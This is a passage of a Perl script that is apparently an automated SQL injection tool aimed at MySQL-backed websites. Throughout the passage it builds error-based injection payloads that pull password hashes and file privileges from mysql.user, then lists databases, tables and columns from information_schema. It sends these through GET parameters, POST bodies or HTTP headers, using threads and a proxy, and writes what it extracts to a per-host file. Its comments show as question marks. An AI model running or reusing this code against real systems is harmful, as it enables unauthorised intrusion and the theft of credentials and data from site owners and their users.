4417.      $url9 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4418.      #### ?????? file_priv #####################################################
4419.      #$temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user" . $nc_plus . "where" . $nc_plus . "user=user)";
4420.      $url10 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "where" . $f_plus . "user=user" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "where" . $f_plus . "user=user" . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4421.      #####################################################################
4422.      $thr = $kol_threads; # ???-?? ???????
4423.      $num = -1; # ?? ????????
4424.      print "-----------------------------------------\n";
4425.      print "System information:\n";
4426.      print "-----------------------------------------\n";
4427.      print FILE  "-----------------------------------------\n";
4428.      print FILE  "SQL: $url1\n";
4429.      print FILE "-----------------------------------------\n";
4430.      print FILE "System information:\n";
4431.      print FILE "-----------------------------------------\n";
4432.      print "Request method - $method\n";
4433.      print "Threads - $kol_threads\n";
4434.      print "Proxy - $proxy_message\n";
4435.      print "----------------------\n";
4436.      for(0..$thr) {
4437.         $trl[$_] = threads->create(\&gets111000);
4438.      }
4439.      for(0..$thr) {
4440.         $trl[$_]->join;
4441.      }
4442.      sub gets111000 {
4443.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
4444.         $size = @array; #???????? ?????? ???????
4445.         $| = 1;
4446.         while ($num<$size) {
4447.             { lock($num);
4448.             $num++; }
4449.            if($sql_flag == 0){
4450.               $current = $array[$num];
4451.               $content = scan_url();
4452.             } elsif ($sql_flag == 1) {#POST
4453.               $current = $f_url;
4454.               $sql_post = $array[$num];
4455.               $content = scan_url_POST();
4456.             } elsif($sql_flag == 2){#HEADER
4457.               $current = $f_url;
4458.               $sql_header_query = $array[$num];
4459.               $sql_header_query =~ s!\Q$search!$replacement!g;
4460.               $content = scan_url_HEADER();
4461.             }
4462.             if ($content =~ m/ussr(.*?)ussr/img) {
4463.                   print $1 . "\n";
4464.                   print FILE $1 . "\n";
4465.             }
4466.             print $num . "\r";
4467.             sleep $pause;
4468.             $current="";
4469.             $content="";
4470.             $sql_post="";
4471.             $sql_header_query="";
4472.         }
4473.      }
4474.      print "----------\n";
4475.      print "Saved in " . "z_" . $host . ".txt\n";
4476.      close(FILE);
4477.      goto START2001;
4478. }#end 1
4479. # DB from schemata
4480. if ($choice == 2) {
4481.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4482.      ## ???-?? ?? ? information_schema.schemata ##
4483.      if($sql_flag == 0){
4484.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4485.               $content = scan_url();
4486.             } elsif ($sql_flag == 1) {#POST
4487.               $current = $f_url;
4488.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4489.               $content = scan_url_POST();
4490.             } elsif($sql_flag == 2){#HEADER
4491.               $current = $f_url;
4492.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4493.               $sql_header_query =~ s!\Q$search!$replacement!g;
4494.               $content = scan_url_HEADER();
4495.             }
4496.      $bd_num = $content;
4497.      $bd_num =~ m/ussr(.*?)ussr/img;
4498.      $bd_num = $1-1;
4499.      $current="";
4500.      $content="";
4501.      $sql_post="";
4502.      $sql_header_query="";  
4503.      print FILE "-----------------------------------------\n";
4504.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
4505.      print FILE "-----------------------------------------\n";
4506.      print "-----------------------------------------\n";
4507.      print "Data bases in information_schema.schemata - $1\n";
4508.      print "-----------------------------------------\n";
4509.      $num = -1; # ?? ????????
4510.      $thr = $kol_threads; # ???-?? ???????
4511.      print "Request method - $method\n";
4512.      print "Threads - $kol_threads\n";
4513.      print "Proxy - $proxy_message\n";
4514.      print "----------------------\n";
4515.      for(0..$thr) {
4516.          $trl[$_] = threads->create(\&gets5050999);
4517.      }
4518.      for(0..$thr) {
4519.          $trl[$_]->join;
4520.      }
4521.      sub gets5050999 {
4522.        $| = 1;
4523.        while ($num<$bd_num) {
4524.          { lock($num);
4525.          $num++; }
4526.          if($sql_flag == 0){
4527.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4528.               $content = scan_url();
4529.             } elsif ($sql_flag == 1) {#POST
4530.               $current = $f_url;
4531.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4532.               $content = scan_url_POST();
4533.             } elsif($sql_flag == 2){#HEADER
4534.               $current = $f_url;
4535.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4536.               $sql_header_query =~ s!\Q$search!$replacement!g;
4537.               $content = scan_url_HEADER();
4538.             }
4539.          if ($content =~ m/ussr(.*?)ussr/img) {
4540.                   print $1 . "\n";
4541.                   print FILE $1 . "\n";
4542.          }
4543.          print $num . "\r";
4544.          sleep $pause;
4545.             $current="";
4546.             $content="";
4547.             $sql_post="";
4548.             $sql_header_query="";
4549.        }
4550.      }
4551.     print "----------\n";
4552.     print "Saved in " . "z_" . $host . ".txt\n";
4553.     close(FILE);
4554.     goto START2001;
4555. } # end DB
4556. # tables from DB from schemata
4557. if ($choice == 3) {
4558.      sub ascii_to_hex ($) {
4559.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
4560.             $str = "0x" . $str;
4561.             return $str;
4562.      }
4563.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4564.      print "-----------------------------------------\n";
4565.      print "Enter the DB-name: ";
4566.      $choice = <STDIN>;
4567.      chomp $choice;
4568.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4569.      print "DB-name: $choice\n";
4570.      print "----------\n";
4571.      $choice1 = ascii_to_hex $choice;
4572.      ## ???-?? tables ? information_schema.schemata ##
4573.      if($sql_flag == 0){
4574.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4575.               $content = scan_url();
4576.             } elsif ($sql_flag == 1) {#POST
4577.               $current = $f_url;
4578.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4579.               $content = scan_url_POST();
4580.             } elsif($sql_flag == 2){#HEADER
4581.               $current = $f_url;
4582.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4583.               $sql_header_query =~ s!\Q$search!$replacement!g;
4584.               $content = scan_url_HEADER();
4585.             }    
4586.      $bd_num = $content;
4587.      $bd_num =~ m/ussr(.*?)ussr/img;
4588.      $bd_num = $1;
4589.             $current="";
4590.             $content="";
4591.             $sql_post="";
4592.             $sql_header_query="";
4593.      print FILE "-----------------------------------------\n";
4594.      print FILE "Tables in $choice: $bd_num\n";
4595.      print FILE "-----------------------------------------\n";
4596.      print "-----------------------------------------\n";
4597.      print "Tables in $choice: $bd_num\n";
4598.      print "-----------------------------------------\n";
4599.      $num = -1; # ?? ????????
4600.      $thr = $kol_threads; # ???-?? ???????
4601.      print "Request method - $method\n";
4602.      print "Threads - $kol_threads\n";
4603.      print "Proxy - $proxy_message\n";
4604.      print "----------------------\n";
4605.      for(0..$thr) {
4606.          $trl[$_] = threads->create(\&gets5050888);
4607.      }
4608.      for(0..$thr) {
4609.          $trl[$_]->join;
4610.      }
4611.      sub gets5050888 {
4612.        $| = 1;
4613.        while ($num<$bd_num) {
4614.          { lock($num);
4615.          $num++; }
4616. if($sql_flag == 0){
4617.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4618.               $content = scan_url();
4619.             } elsif ($sql_flag == 1) {#POST
4620.               $current = $f_url;
4621.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4622.               $content = scan_url_POST();
4623.             } elsif($sql_flag == 2){#HEADER
4624.               $current = $f_url;
4625.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4626.               $sql_header_query =~ s!\Q$search!$replacement!g;
4627.               $content = scan_url_HEADER();
4628.             }          
4629.        if ($content =~ m/ussr(.*?)ussr/img) {
4630.                   print $1 . "\n";
4631.                   print FILE $1 . "\n";
4632.          }
4633.          print $num . "\r";
4634.          sleep $pause;
4635.             $current="";
4636.             $content="";
4637.             $sql_post="";
4638.             $sql_header_query="";
4639.  
4640.        }
4641.      }
4642.     print "----------\n";
4643.     print "Saved in " . "z_" . $host . ".txt\n";
4644.     close(FILE);
4645.     goto START2001;
4646. } # end tables from DB
4647. # columns tables from tables from DB
4648. if ($choice == 4) {
4649.      sub ascii_to_hex ($) {
4650.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
4651.             $str = "0x" . $str;
4652.             return $str;
4653.      }
4654.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4655.      print "-----------------------------------------\n";
4656.      print "Enter the DB-name: ";
4657.      $choice = <STDIN>;
4658.      chomp $choice;
4659.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4660.      $choice1 = ascii_to_hex $choice;
4661.      print "DB-name: $choice\n";
4662.      print "----------\n";
4663.      $choice1 = ascii_to_hex $choice;
4664.      print "-----------------------------------------\n";
4665.      print "Enter the TABLE-name: ";
4666.      $choice2 = <STDIN>;
4667.      chomp $choice2;
4668.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
4669.         $choice3 = ascii_to_hex $choice2;
4670.      print "TABLE-name: $choice2\n";
4671.      print "----------\n";
4672.      if($sql_flag == 0){
4673.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4674.               $content = scan_url();
4675.      } elsif ($sql_flag == 1) {#POST
4676.               $current = $f_url;
4677.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4678.               $content = scan_url_POST();
4679.      } elsif($sql_flag == 2){#HEADER
4680.               $current = $f_url;
4681.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4682.               $sql_header_query =~ s!\Q$search!$replacement!g;
4683.               $content = scan_url_HEADER();
4684.      }              
4685.      $bd_num = $content;
4686.      $bd_num =~ m/ussr(.*?)ussr/img;
4687.      $bd_num = $1;
4688.             $current="";
4689.             $content="";
4690.             $sql_post="";
4691.             $sql_header_query="";
4692.      print FILE "-----------------------------------------\n";
4693.      print FILE "Columns in [$choice.$choice2]: $bd_num\n";
4694.      print FILE "-----------------------------------------\n";
4695.      print "-----------------------------------------\n";
4696.      print "Columns in [$choice.$choice2]: $bd_num\n";
4697.      print "-----------------------------------------\n";
4698.      $num = -1; # ?? ????????
4699.      $thr = $kol_threads; # ???-?? ???????
4700.      print "Request method - $method\n";
4701.      print "Threads - $kol_threads\n";
4702.      print "Proxy - $proxy_message\n";
4703.      print "----------------------\n";
4704.      for(0..$thr) {
4705.          $trl[$_] = threads->create(\&gets5050777);
4706.      }
4707.      for(0..$thr) {
4708.          $trl[$_]->join;
4709.      }
4710.      sub gets5050777 {
4711.        $| = 1;
4712.        while ($num<$bd_num) {
4713.          { lock($num);
4714.          $num++; }
4715.       if($sql_flag == 0){
4716.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4717.               $content = scan_url();
4718.       } elsif ($sql_flag == 1) {#POST
4719.               $current = $f_url;
4720.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4721.               $content = scan_url_POST();
4722.       } elsif($sql_flag == 2){#HEADER
4723.               $current = $f_url;
4724.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4725.               $sql_header_query =~ s!\Q$search!$replacement!g;
4726.               $content = scan_url_HEADER();
4727.       }              
4728.  
4729.          if ($content =~ m/ussr(.*?)ussr/img) {
4730.                   print $1 . "\n";
4731.                   print FILE $1 . "\n";
4732.          }
4733.          print $num . "\r";
4734.          sleep $pause;
4735.             $current="";
4736.             $content="";
4737.             $sql_post="";
4738.             $sql_header_query="";
4739.  
4740.        }
4741.      }
4742.     print "----------\n";
4743.     print "Saved in " . "z_" . $host . ".txt\n";
4744.     close(FILE);
4745.     goto START2001;
4746. } # end columns tables from tables from DB
4747. if ($choice==5) {
4748.      sub ascii_to_hex ($) {
4749.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
4750.             $str = "0x" . $str;
4751.             return $str;
4752.      }
4753.        open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4754.      ## ???-?? ?????? ? information_schema.tables ##
4755.       if($sql_flag == 0){
4756.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4757.               $content = scan_url();
4758.       } elsif ($sql_flag == 1) {#POST
4759.               $current = $f_url;
4760.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4761.               $content = scan_url_POST();
4762.       } elsif($sql_flag == 2){#HEADER
4763.               $current = $f_url;
4764.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4765.               $sql_header_query =~ s!\Q$search!$replacement!g;
4766.               $content = scan_url_HEADER();
4767.       }                  
4768.      $tab_num = $content;
4769.      $tab_num =~ m/ussr(.*?)ussr/img;
4770.      $tab_num = $1-1; # ???-?? ???????? ? informaion_schema
4771.             $current="";
4772.             $content="";
4773.             $sql_post="";
4774.             $sql_header_query="";
4775.      print "-----------------------------------------\n";
4776.      print "Tables in information_schema.tables - $1\n";
4777.      print "-----------------------------------------\n";
4778.      ## start from2 ##
4779.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
4780.      $choice = <STDIN>;
4781.      chomp $choice;
4782.      $thr = $kol_threads; # ???-?? ???????
4783.      if ($choice == 1) {
4784.           $num = -1; # ?? ????????
4785.      } else {
4786.           print "Enter START_position: ";
4787.           $choice1 = <STDIN>;
4788.           chomp $choice1;
4789.           $num = $choice1-2;
4790.           print "Enter END_position: ";
4791.           $choice2 = <STDIN>;
4792.           chomp $choice2;
4793.           $tab_num = $choice2-1;
4794.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
4795.      }
4796.      print "-----------------------------------------\n";
4797.      ## end from2
4798.      print FILE  "-----------------------------------------\n";
4799.      print FILE  "Tables in information_schema.tables - $1\n";
4800.      print FILE  "-----------------------------------------\n";
4801.      print "Request method - $method\n";
4802.      print "Threads - $kol_threads\n";
4803.      print "Proxy - $proxy_message\n";
4804.      print "----------------------\n";
4805.      for(0..$thr) {
4806.          $trl[$_] = threads->create(\&gets112);
4807.      }
4808.      for(0..$thr) {
4809.          $trl[$_]->join;
4810.      }
4811.      sub gets112 {
4812.        $| = 1;
4813.        while ($num<$tab_num) {
4814.          { lock($num);
4815.          $num++; }
4816.       if($sql_flag == 0){
4817.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4818.               $content = scan_url();
4819.       } elsif ($sql_flag == 1) {#POST
4820.               $current = $f_url;
4821.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4822.               $content = scan_url_POST();
4823.       } elsif($sql_flag == 2){#HEADER
4824.               $current = $f_url;
4825.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
4826.               $sql_header_query =~ s!\Q$search!$replacement!g;
4827.               $content = scan_url_HEADER();
4828.       }                            
4829.         if ($content =~ m/ussr(.*?)ussr/img) {
4830.                   print $1 . "\n";
4831.                   print FILE $1 . "\n";
4832.          }
4833.          print $num . "\r";
4834.          sleep $pause;
4835.             $current="";
4836.             $content="";
4837.             $sql_post="";
4838.             $sql_header_query="";
4839.        }
4840.      }
4841.     print "----------\n";
4842.     print "Saved in " . "z_" . $host . ".txt\n";
4843.     close(FILE);
4844.     goto START2001;
4845. }#end 2
4846. if ($choice==6) {
4847.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
4848.     print "-----------------------------------------\n";
4849.     print "Enter the table_name: ";
4850.     $choice = <STDIN>;
4851.     chomp $choice;
4852.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
4853.     print "Table: $choice\n";
4854.     print "----------\n";
4855.     print FILE  "-----------------------------------------\n";
4856.     print FILE  "Table [ $choice ]\n";
4857.     print FILE  "-----------------------------------------\n";
4858.     $choice1 = ascii_to_hex $choice;
4859.      if($sql_flag == 0){
4860.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4861.               $content = scan_url();
4862.       } elsif ($sql_flag == 1) {#POST
4863.               $current = $f_url;
4864.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4865.               $content = scan_url_POST();
4866.       } elsif($sql_flag == 2){#HEADER
4867.               $current = $f_url;
4868.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4869.               $sql_header_query =~ s!\Q$search!$replacement!g;
4870.               $content = scan_url_HEADER();
4871.       }                  
4872.     $prefix = $content;
4873.     $prefix =~ m/ussr(.*?)ussr/img;
4874.     $prefix = $1; # ??, ? ??????? ???????
4875.             $current="";
4876.             $content="";
4877.             $sql_post="";
4878.             $sql_header_query="";
4879.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
4880.     print "Database for $choice: $prefix\n";
4881.     print FILE  "Database for $choice: $prefix\n";
4882.       if($sql_flag == 0){
4883.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4884.               $content = scan_url();
4885.       } elsif ($sql_flag == 1) {#POST
4886.               $current = $f_url;
4887.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
4888.               $content = scan_url_POST();
4889.       } elsif($sql_flag == 2){#HEADER
4890.               $current = $f_url;
